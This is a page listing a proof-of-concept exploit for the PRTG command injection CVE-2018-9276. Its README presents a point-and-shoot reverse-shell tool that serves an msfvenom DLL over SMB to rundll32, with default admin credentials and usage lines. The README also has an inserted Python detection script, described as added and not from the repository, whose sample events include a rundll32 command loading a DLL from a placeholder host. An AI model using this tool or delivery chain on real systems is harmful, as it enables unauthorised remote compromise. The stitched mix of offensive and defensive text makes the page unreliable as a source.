CVE-2018-9276 PoC: Paessler PRTG Network Monitor OS Command Injection Vulnerability

Source
Associated Vulnerability
Title: Paessler PRTG Network Monitor OS Command Injection Vulnerability (CVE-2018-9276)
Description: An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.
Description
CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
Readme
# CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276

Improved version of an exploit written by https://github.com/M4LV0.  I used the POST data from their script but just made it more reliable as I didn't have much success with it.

Payload delivery is essentially smb_delivery.  Impacket serves up a .dll generated by msfvenom, rundll32.exe does all the work.

Tested on Windows Server 2016 against PRTG 18.1.37.

## Dependencies

By no means is this well written and it's cobbled together from Stack Overflow.  This was developed for use with Kali Linux and assumes the following is available:
* Impacket
* Netcat
* Msfvenom

## Assumptions
This is a point and shoot exploit, all you need to know are the admin credentials for the PRTG instance (default prtgadmin:prtgadmin).  Depending on the configuration of the target machine, your mileage may vary.  The following assumptions have been made:
* Target machine is Windows;
* Defender / Applocker is not running; and
* Outbound SMB access is permitted
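
The delivery chain and assumptions above translate directly into a detection: `rundll32.exe` loading a DLL from a UNC path on a host that runs PRTG older than 18.2.39. The following is an added example, not code from this repository; the host names, the inventory and the sample events are constructed, and the event field names follow Sysmon-style process-creation logs.

```python
import re
from typing import Optional

FIXED = (18, 2, 39)  # first fixed PRTG release per the CVE description

# A DLL referenced by UNC path (\\host\share\file.dll), i.e. fetched over SMB
UNC_DLL = re.compile(r'\\\\[^\\\s"]+\\[^\s",]+\.dll', re.IGNORECASE)

def is_vulnerable(version: str) -> bool:
    """True when a PRTG version such as '18.1.37' predates 18.2.39."""
    return tuple(int(p) for p in version.split(".")[:3]) < FIXED

def triage(event: dict, inventory: dict) -> Optional[str]:
    """Return a severity for rundll32 loading a DLL over SMB, else None."""
    if not event.get("Image", "").lower().endswith("\\rundll32.exe"):
        return None
    if not UNC_DLL.search(event.get("CommandLine", "")):
        return None
    version = inventory.get(event.get("Computer", ""))
    return "high" if version and is_vulnerable(version) else "medium"

# Constructed inventory: host -> installed PRTG version (hypothetical hosts)
INVENTORY = {"mon01.example.test": "18.1.37", "mon02.example.test": "18.2.39"}

# Constructed process-creation events (Sysmon-style field names)
EVENTS = [
    {"Computer": "mon01.example.test",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.0.2.10\SHARE\update.dll,0"},
    {"Computer": "mon02.example.test",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "\\192.0.2.10\SHARE\update.dll",0'},
    {"Computer": "mon01.example.test",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

def scan(events, inventory):
    """Return (host, severity, command line) for every flagged event."""
    hits = []
    for ev in events:
        sev = triage(ev, inventory)
        if sev:
            hits.append((ev["Computer"], sev, ev["CommandLine"]))
    return hits

if __name__ == "__main__":
    for host, sev, cmd in scan(EVENTS, INVENTORY):
        print(f"[{sev}] {host}: {cmd}")
```

Blocking outbound SMB at the perimeter and changing the default `prtgadmin` password remove two of the preconditions the README lists; upgrading to 18.2.39 or later removes the injection itself.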

## Installation


```bash
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
```

## Usage
Figure out the credentials and drop shells :)
```text
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]

optional arguments:
  -h, --help            show this help message and exit
  -i HOST, --host HOST  IP address / Hostname of vulnerable PRTG server
  -p PORT, --port PORT  Port number
  --lhost LHOST         LHOST for MSFVENOM
  --lport LPORT         LPORT for MSFVENOM
  --user USER           Administrator Username
  --password PASSWORD   Administrator Password
  --https               Negotiate SSL connection to the server (Requires
                        socket to be compiled with SSL support)

```
## Disclaimer

This won't let you hack the Gibson.  Do not use this against ANY systems for which you are unauthorised.  I wrote this for fun.  Educational purposes only etc etc.